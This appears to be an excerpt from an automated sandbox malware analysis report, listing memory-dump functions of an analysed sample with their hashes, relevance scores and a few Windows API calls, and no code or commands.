                                                                                  • Instruction ID: 4950814dbf77a1002b16b873e8404de974c85caa55f55b959eb7c45ab680b27b
                                                                                  • Opcode Fuzzy Hash: 250c5c434f3b5270dbb7dc43245548b4ff86b059e3bd0580af821b6809a433bb
                                                                                  • Instruction Fuzzy Hash: F8212871504240DFDB05CF54D9C4B16BF66FB98328F24856AEC490B286C336D846D7B1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00D1D030 Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563369321.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d1d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cb2b1a9aa844d41c51807ef27cd5e2142ed4f2f9b633652a39c1b232283b62f5
                                                                                  • Instruction ID: 7f8a073c5845c67f9cd34d14cb4bd568d1f6ee294d2757fcefef2929dff23061
                                                                                  • Opcode Fuzzy Hash: cb2b1a9aa844d41c51807ef27cd5e2142ed4f2f9b633652a39c1b232283b62f5
                                                                                  • Instruction Fuzzy Hash: BF213775508240EFCB10DF14E9C0B56BBA2FB88314F34C669E8490B246CB36D887DB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00D1D005 Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563369321.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d1d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fd925f3798c918c86359b7366f3d520e11073821dc654603ba7b8ad3f8d00d4f
                                                                                  • Instruction ID: f1a84428b3f869369811f25823137de9f015490314d03538a144a0f8cc5b03f7
                                                                                  • Opcode Fuzzy Hash: fd925f3798c918c86359b7366f3d520e11073821dc654603ba7b8ad3f8d00d4f
                                                                                  • Instruction Fuzzy Hash: 3A215C7154D7C09FDB038F24D990B11BF71AB46214F2985EBD8848F2A7C33A985ACB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00D0D20B Relevance: .1, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563335544.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d0d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f906f83a178082e7d7d0a07ac00f86b8a262bd51881fd340313f04e9881f9409
                                                                                  • Instruction ID: 83a923b518c32e1a371e9a99d948576d87249235a1d1c6c3090e3c4a08cf3edb
                                                                                  • Opcode Fuzzy Hash: f906f83a178082e7d7d0a07ac00f86b8a262bd51881fd340313f04e9881f9409
                                                                                  • Instruction Fuzzy Hash: 0121B476504280DFCB06CF54D9C4B16BF72FB84324F28C6AADC080B656C336D856CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00D0D4D3 Relevance: .1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563335544.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d0d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                  • Instruction ID: 05223f5ae09964c1e94c6190638c56723a4c75251d8137e8b7304bcd35af94b4
                                                                                  • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                  • Instruction Fuzzy Hash: 6711E676504280CFCB16CF54D9C4B16BF72FB95324F28C6AADC090B656C33AD856CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00D0D819 Relevance: .0, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563335544.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d0d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4d7f7c3c03395ac89322ff69c2fcd29de74e2d544fea6dd5b6e4c35dedd9affa
                                                                                  • Instruction ID: 3f4caf9ac14869aa2e0bebdb4e6d94e58d2f93145c86fd340e5ba2689116058b
                                                                                  • Opcode Fuzzy Hash: 4d7f7c3c03395ac89322ff69c2fcd29de74e2d544fea6dd5b6e4c35dedd9affa
                                                                                  • Instruction Fuzzy Hash: EE01F771908384AAE7108A99CC84762BF98EF41730F1CC45BED491F2C6C378DC44DAB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00D0D818 Relevance: .0, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563335544.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d0d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b4182fc41ae3a74456235ef06c1907d475f4f779aaeba7d6d3cb7799a4a85b75
                                                                                  • Instruction ID: 33a18aff26a7f1814add564a517d9378a394d79096cee406101ba83c15867dd8
                                                                                  • Opcode Fuzzy Hash: b4182fc41ae3a74456235ef06c1907d475f4f779aaeba7d6d3cb7799a4a85b75
                                                                                  • Instruction Fuzzy Hash: 2FF06271904284AEE7118A5ADC84B62FFA8EF91774F18C55AED085F286C379DC44CAB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Function 05383DE8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 05383E58
                                                                                  • GetCurrentThread.KERNEL32 ref: 05383E95
                                                                                  • GetCurrentProcess.KERNEL32 ref: 05383ED2
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 05383F2B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.568976355.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_5380000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Current$ProcessThread
                                                                                  • String ID:
                                                                                  • API String ID: 2063062207-0
                                                                                  • Opcode ID: d1919f66b585a125e23875a948289a7adfae7f72d9d189131aaae6197f187a8e
                                                                                  • Instruction ID: 1e520a34abe00ebee1f74b6c3fee68b33d8eeb8c4a3b25fd92dcba9f51df600e
                                                                                  • Opcode Fuzzy Hash: d1919f66b585a125e23875a948289a7adfae7f72d9d189131aaae6197f187a8e
                                                                                  • Instruction Fuzzy Hash: 105156B09003498FDB14DFAAD9887EEBFF1BF88704F208569E419A7350D775A884CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05383DF8 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 05383E58
                                                                                  • GetCurrentThread.KERNEL32 ref: 05383E95
                                                                                  • GetCurrentProcess.KERNEL32 ref: 05383ED2
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 05383F2B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.568976355.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_5380000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Current$ProcessThread
                                                                                  • String ID:
                                                                                  • API String ID: 2063062207-0
                                                                                  • Opcode ID: fac0bb656d7073d9c36cf3fe3e0bb55e293124d31fc3a80e5b30906d684d2291
                                                                                  • Instruction ID: d5f0757ae4365a1e6ea1af9eeca653d5311837b34207bd8062e2db2e05cc70d0
                                                                                  • Opcode Fuzzy Hash: fac0bb656d7073d9c36cf3fe3e0bb55e293124d31fc3a80e5b30906d684d2291
                                                                                  • Instruction Fuzzy Hash: 955146B09003498FDB14DFAAD9887EEBBF1FF88704F208569E419A7350D775A884CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%